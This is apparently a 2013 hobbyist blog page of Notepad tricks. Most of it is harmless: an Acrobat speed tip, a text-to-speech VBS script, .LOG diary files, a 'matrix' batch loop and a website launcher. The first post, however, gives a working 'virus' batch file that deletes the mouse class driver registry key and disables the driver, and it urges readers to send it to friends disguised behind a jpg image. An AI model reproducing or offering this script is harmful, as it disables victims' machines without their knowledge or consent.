Sunday 17 February 2013

Disable Mouse In Windows Using Your Own Virus




Hi To All The Mindbenders,

Make a virus that Will disable Mouse.
We Used Registry For This Act.
1. Open Notepad and copy below codes(text in red)

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Save this file as virus.bat
Done you just created your virus, now share this with your friends and use cmd to bind this bat file behind any jpg image file as i told you in my Tutorial 

 

3. Download  Virus.bat 


Speed Up Your Adobe Acrobat Reader Opening speed


Hi To all The Mindbenders,

Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.

===(Next is what...?)===

Friday 15 February 2013

Notepad Adda | Trick and Tips With Notepad


Hi To All The Mindbenders,
Text to Audio
1. Open Notepad file on your Windows PC.
2. Copy and paste the below mentioned code in red text:

Dim msg, sapi

msg=InputBox("Enter your text for conversion– https://www.facebook.com/themindbenders ","DEVENDERMAHTO Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

3. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

4. Download Text-To-Audio.vbs


Creating Logs
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

1. Open Notepad and Type .LOG (in capital Letters and press enter


2. Save the program with any name and close it.


3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.



Matrix Terminal
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

1. Open Noteapad and copy below code into it.

@echo offcolor 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


2. Now save this file as Matrix.bat (name can be anything but .bat is must)

3. Open your saved file and you will have matrix effect on your screen...
4. Download matrix effect.bat


Website Starter
Trick is based on batch programming so we will use a bat file to open any website of our choice.
1. Open Noteapad and copy below code into it.

start https://www.facebook.com/themindbenders

2. Now save this file as themindbenders.bat (name can be anything but .bat is must)

3. Open your saved bat file and Double Click to open it then it will open up your web-browser with website you mentioned in your bat file after start command...
4. Download Website starter.bat
===(Next Is What...?)===